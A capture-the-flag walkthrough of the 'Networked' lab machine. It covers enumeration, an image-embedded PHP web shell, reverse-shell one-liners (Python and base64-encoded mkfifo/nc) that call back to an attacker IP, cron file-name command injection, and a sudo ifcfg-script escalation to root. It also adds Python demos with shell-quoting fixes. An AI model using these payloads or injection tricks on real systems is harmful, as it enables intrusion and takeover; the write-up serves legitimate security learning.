Networked (Easy)

Enumeration

Nmap

nmap -sC -sV -oA nmap/Networked -Pn 10.129.88.235
# Nmap 7.92 scan initiated Wed Jun  8 02:00:26 2022 as: nmap -sC -sV -oA nmap/Networked -Pn 10.129.88.235
Nmap scan report for 10.129.88.235
Host is up (0.22s latency).
Not shown: 971 filtered tcp ports (no-response), 26 filtered tcp ports (host-unreach)
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
|   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_  256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp  open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
443/tcp closed https

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun  8 02:01:06 2022 -- 1 IP address (1 host up) scanned in 39.29 seconds

We can navigate to port 80.

If we view the page source, we can see an interesting comment.

I tried upload, /uploads, upload.php and gallery.php, and found that /uploads and upload.php each led to a new page.

Gobuster

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.129.88.235/
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.88.235/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/06/08 02:38:34 Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 237] [--> http://10.129.88.235/uploads/]
/backup               (Status: 301) [Size: 236] [--> http://10.129.88.235/backup/]
[!] Keyboard interrupt detected, terminating.

===============================================================
2022/06/08 02:52:35 Finished
===============================================================

Navigating to /backup shows a directory listing containing a backup.tar file.

Download the file and extract it.

After inspecting the extracted source, I decided to bypass the upload check with a well-known trick: embedding a PHP payload in the image's comment metadata, so the file still looks like an image to the server-side check.

exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' ss.png

Note the double quotes around cmd: single quotes there would terminate the shell's single-quoted argument early.

Then upload it through the web application.

Image successfully uploaded.

Open the uploaded image directly rather than through the gallery, so that the server executes the embedded PHP when the file is requested.

Append a cmd GET parameter to the URL and pass in any command; its output appears after the <pre> tag (the raw PNG bytes before the payload are printed as garbage, which is harmless).

We can then use this to spawn a reverse shell, for example with the following Python one-liner passed through cmd (URL-encode it, since it contains spaces, quotes and semicolons):

export RHOST="10.10.14.103";export RPORT=4444;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

In /home we can see that user.txt is not readable by our current user; we need to move to the guly user first.

guly's home directory contains some interesting files.

crontab.guly

*/3 * * * * php /home/guly/check_attack.php

check_attack.php

<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
        $msg='';
  if ($value == 'index.html') {
        continue;
  }
  #echo "-------------\n";

  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}

?>

So every 3 minutes cron runs check_attack.php as guly.

Reading check_attack.php, the vulnerability is on this line:

exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");

It concatenates $path and $value straight into a shell command. $value is just a file name returned by scandir() on /var/www/html/uploads, and since we can write to that directory through the web shell, we control it completely.

The script's purpose is to delete any file in the uploads directory whose name does not pass check_ip(). That deletion is the vulnerable exec() call, so a file with a bad name is both what triggers the call and what gets injected into it.

So we create a file in /var/www/html/uploads with a name like this (quote the name when creating it with touch, since it contains spaces and semicolons):

1; echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDEwLjEwLjE0LjEwMyA0NDQ1ID4vdG1wL2Y= | base64 -d | sh; 1

The base64 decodes to a standard mkfifo/nc reverse shell back to 10.10.14.103:4445. It is encoded because a Linux file name cannot contain /, which the raw command does; this particular encoding happens to contain no / either, which is worth checking before reusing the trick with a different payload. When cron fires, the shell line becomes nohup /bin/rm -f /var/www/html/uploads/1; echo ... | base64 -d | sh; 1 > /dev/null 2>&1 &, and the middle command runs as guly.

Start a listener on port 4445 and wait up to 3 minutes for the callback.
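The file-name injection above, as an added example (not from the original writeup): build_filename encodes an arbitrary command the way the page's payload is encoded, retrying the base64 alignment with leading spaces if a / would land in the file name; vulnerable_line and hardened_line show the exec() argument as check_attack.php builds it versus the same command with the path quoted (escapeshellarg in PHP, shlex.quote here). demo runs both through /bin/sh with a benign "echo injected" payload against a temporary directory standing in for the uploads folder, so it is safe to execute locally. The temporary uploads path and the benign command are constructed for the demo.

```python
import base64
import shlex
import subprocess
import tempfile

# The command the writeup's base64 decodes to (reverse shell to 10.10.14.103:4445).
REVSHELL = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.103 4445 >/tmp/f"


def base64_without_slash(cmd: str) -> str:
    """base64 the command for use inside a file name.

    '/' is the one byte (besides NUL) a Linux file name cannot contain, so if
    the encoding has one, shift the input alignment with leading spaces, which
    sh ignores. Only three alignments exist, so this can fail for some inputs.
    """
    for pad in range(3):
        enc = base64.b64encode((" " * pad + cmd).encode()).decode()
        if "/" not in enc:
            return enc
    raise ValueError("all three alignments contain '/'; rephrase the command")


def build_filename(cmd: str) -> str:
    """File name that, spliced into `rm -f $path$value`, runs cmd as the cron user."""
    return "1; echo %s | base64 -d | sh; 1" % base64_without_slash(cmd)


def vulnerable_line(path: str, value: str) -> str:
    """What check_attack.php hands to exec(): plain string concatenation."""
    return "nohup /bin/rm -f %s%s > /dev/null 2>&1 &" % (path, value)


def hardened_line(path: str, value: str) -> str:
    """Same command with the argument shell-quoted, so ';' and '|' are inert."""
    return "nohup /bin/rm -f %s > /dev/null 2>&1 &" % shlex.quote(path + value)


def run_in_sh(line: str) -> str:
    """Execute the line in /bin/sh and return its stdout."""
    proc = subprocess.run(["/bin/sh", "-c", line], capture_output=True, text=True,
                          stdin=subprocess.DEVNULL, timeout=10)
    return proc.stdout.strip()


def demo() -> tuple:
    """(stdout of the vulnerable line, stdout of the hardened line) for a benign payload."""
    with tempfile.TemporaryDirectory() as uploads:  # constructed stand-in for /var/www/html/uploads/
        value = build_filename("echo injected")
        path = uploads + "/"
        return run_in_sh(vulnerable_line(path, value)), run_in_sh(hardened_line(path, value))


if __name__ == "__main__":
    print(build_filename(REVSHELL))
    print(vulnerable_line("/var/www/html/uploads/", build_filename("echo injected")))
    print(hardened_line("/var/www/html/uploads/", build_filename("echo injected")))
    print(demo())
```

With the unquoted version the injected echo runs and prints "injected"; with the quoted version rm -f receives the whole file name as one argument, fails silently on the nonexistent file, and nothing else executes.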

Privilege Escalation

Run sudo -l to check which commands guly can execute via sudo.

We can see guly is allowed to run a script named changename.sh:

#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
        echo "interface $var:"
        read x
        while [[ ! $x =~ $regexp ]]; do
                echo "wrong input, try again"
                echo "interface $var:"
                read x
        done
        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
  
/sbin/ifup guly0

The script prompts for four values (NAME, PROXY_METHOD, BROWSER_ONLY, BOOTPROTO) and validates each against the regex, which allows letters, digits, underscore, space, slash and hyphen.

It first rewrites ifcfg-guly with a fixed header (cat > ... << EoF), then appends VAR=value for each answer, and finally calls /sbin/ifup guly0 on the result.

If we supply a value containing a space, ifup fails with an error mentioning the word after the space. The network scripts source the ifcfg file as shell, so a line such as NAME=guly foo is parsed as the assignment NAME=guly followed by the command foo.

Immediately I know what to enter: a value with a space followed by bash, which runs bash with the script's privileges and gives us a root bash.
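The changename.sh flaw reproduced locally, as an added example (not part of the original writeup): accepted_by_changename applies the script's own regex, write_ifcfg recreates the file the script builds, and source_like_ifup emulates what ifup does with it by sourcing it in /bin/sh. The answers are constructed; the NAME value passes the regex but carries a space, so sourcing runs "echo injected" instead of the bash the writeup uses. The quote_values option is the fix the script lacks: shell-quoting each value before writing it turns the line back into a plain assignment.

```python
import os
import re
import shlex
import subprocess
import tempfile

# Pattern copied from changename.sh: letters, digits, '_', space, '/' and '-'.
CHANGENAME_RE = re.compile(r"^[a-zA-Z0-9_\ /-]+$")

# Constructed answers for the demo. NAME passes the regex but contains a space,
# so when sourced, `NAME=guly echo injected` is the assignment NAME=guly
# followed by the command `echo injected`.
ANSWERS = {
    "NAME": "guly echo injected",
    "PROXY_METHOD": "none",
    "BROWSER_ONLY": "no",
    "BOOTPROTO": "dhcp",
}


def accepted_by_changename(value: str) -> bool:
    """True if the script's read loop would accept this answer."""
    return CHANGENAME_RE.match(value) is not None


def write_ifcfg(directory: str, answers: dict, quote_values: bool = False) -> str:
    """Reproduce the file the script builds: fixed header, then VAR=value per answer.

    quote_values=True is the missing hardening: shell-quote each value so that
    sourcing the file can only ever perform an assignment.
    """
    path = os.path.join(directory, "ifcfg-guly")
    with open(path, "w") as fh:
        fh.write("DEVICE=guly0\nONBOOT=no\nNM_CONTROLLED=no\n")
        for var, value in answers.items():
            fh.write("%s=%s\n" % (var, shlex.quote(value) if quote_values else value))
    return path


def source_like_ifup(path: str) -> str:
    """The network scripts read ifcfg-* by sourcing them as shell; emulate that
    with `. file` in /bin/sh and return whatever the file made the shell print."""
    proc = subprocess.run(["/bin/sh", "-c", ". " + shlex.quote(path)],
                          capture_output=True, text=True,
                          stdin=subprocess.DEVNULL, timeout=10)
    return proc.stdout.strip()


def demo() -> tuple:
    """(output when sourced as the script writes it, output with quoted values)."""
    with tempfile.TemporaryDirectory() as d:
        unsafe = source_like_ifup(write_ifcfg(d, ANSWERS))
        safe = source_like_ifup(write_ifcfg(d, ANSWERS, quote_values=True))
    return unsafe, safe


if __name__ == "__main__":
    print([accepted_by_changename(v) for v in ANSWERS.values()])
    print(demo())
```

The regex is the root of the problem: it rejects ;, $, ( and backticks, but a bare space is enough once the file is interpreted as shell, and the script's own echo $var=$x >> ... line writes the value unquoted. Replace "echo injected" with bash and the sourced line becomes NAME=guly bash, which is the writeup's root shell.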

Navigate to /root and read root.txt.

Congrats!
